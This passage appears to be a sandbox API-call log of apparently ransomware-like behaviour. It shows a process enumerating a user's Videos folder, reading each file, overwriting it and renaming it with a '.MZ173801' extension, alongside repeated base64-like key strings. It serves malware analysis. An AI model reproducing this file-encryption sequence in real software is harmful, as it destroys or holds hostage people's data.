lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b71860, ftCreationTime.dwHighDateTime=0x1d5e3c3, ftLastAccessTime.dwLowDateTime=0xca730fd0, ftLastAccessTime.dwHighDateTime=0x1d5e4cb, ftLastWriteTime.dwLowDateTime=0xca730fd0, ftLastWriteTime.dwHighDateTime=0x1d5e4cb, nFileSizeHigh=0x0, nFileSizeLow=0x172af, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="IIsaB.mkv", cAlternateFileName="")) returned 1 [0119.643] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.643] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.643] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\IIsaB.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\iisab.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b71860, ftCreationTime.dwHighDateTime=0x1d5e3c3, ftLastAccessTime.dwLowDateTime=0xca730fd0, ftLastAccessTime.dwHighDateTime=0x1d5e4cb, ftLastWriteTime.dwLowDateTime=0xca730fd0, ftLastWriteTime.dwHighDateTime=0x1d5e4cb, nFileSizeHigh=0x0, nFileSizeLow=0x172af)) returned 1 [0119.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.644] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.644] GetCurrentThreadId () returned 0x1358 [0119.644] GetCurrentThreadId () returned 0x1358 [0119.644] GetCurrentThreadId () returned 0x1358 [0119.645] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.645] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.645] GetCurrentThreadId () returned 0x1358 [0119.645] GetCurrentThreadId () returned 0x1358 [0119.645] GetCurrentThreadId () returned 0x1358 [0119.645] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\IIsaB.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\iisab.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.646] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0119.646] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.646] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x172af [0119.646] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0119.646] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x172af, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x172af, lpOverlapped=0x0) returned 1 [0119.648] CloseHandle (hObject=0x408) returned 1 [0119.650] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\IIsaB.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\iisab.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0119.651] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x172af, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0x172af, lpOverlapped=0x0) returned 1 [0119.654] CloseHandle (hObject=0x408) returned 1 [0119.656] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\IIsaB.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\iisab.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\IIsaB.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\iisab.mkv.mz173801")) returned 1 [0119.657] GetCurrentThreadId () returned 0x1358 [0119.657] GetCurrentThreadId () returned 0x1358 [0119.657] GetCurrentThreadId () returned 0x1358 [0119.657] GetCurrentThreadId () returned 0x1358 [0119.657] GetCurrentThreadId () returned 0x1358 [0119.657] GetCurrentThreadId () returned 0x1358 [0119.657] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41df9dd0, ftCreationTime.dwHighDateTime=0x1d5ef4a, ftLastAccessTime.dwLowDateTime=0xe70ceb30, ftLastAccessTime.dwHighDateTime=0x1d5edfd, ftLastWriteTime.dwLowDateTime=0xe70ceb30, ftLastWriteTime.dwHighDateTime=0x1d5edfd, nFileSizeHigh=0x0, nFileSizeLow=0x1fba, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="lsT2a0U oQPdx7YbeML.swf", cAlternateFileName="LST2A0~1.SWF")) returned 1 [0119.657] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0119.658] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0119.658] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\lsT2a0U oQPdx7YbeML.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\lst2a0u oqpdx7ybeml.swf"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41df9dd0, ftCreationTime.dwHighDateTime=0x1d5ef4a, ftLastAccessTime.dwLowDateTime=0xe70ceb30, ftLastAccessTime.dwHighDateTime=0x1d5edfd, ftLastWriteTime.dwLowDateTime=0xe70ceb30, ftLastWriteTime.dwHighDateTime=0x1d5edfd, nFileSizeHigh=0x0, nFileSizeLow=0x1fba)) returned 1 [0119.658] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.658] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0119.658] GetCurrentThreadId () returned 0x1358 [0119.658] GetCurrentThreadId () returned 0x1358 [0119.658] GetCurrentThreadId () returned 0x1358 [0119.659] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0119.659] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0119.659] GetCurrentThreadId () returned 0x1358 [0119.659] GetCurrentThreadId () returned 0x1358 [0119.659] GetCurrentThreadId () returned 0x1358 [0119.659] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\NVV_UxLtcOyTWBX\\lsT2a0U oQPdx7YbeML.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\nvv_uxltcoytwbx\\lst2a0u oqpdx7ybeml.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 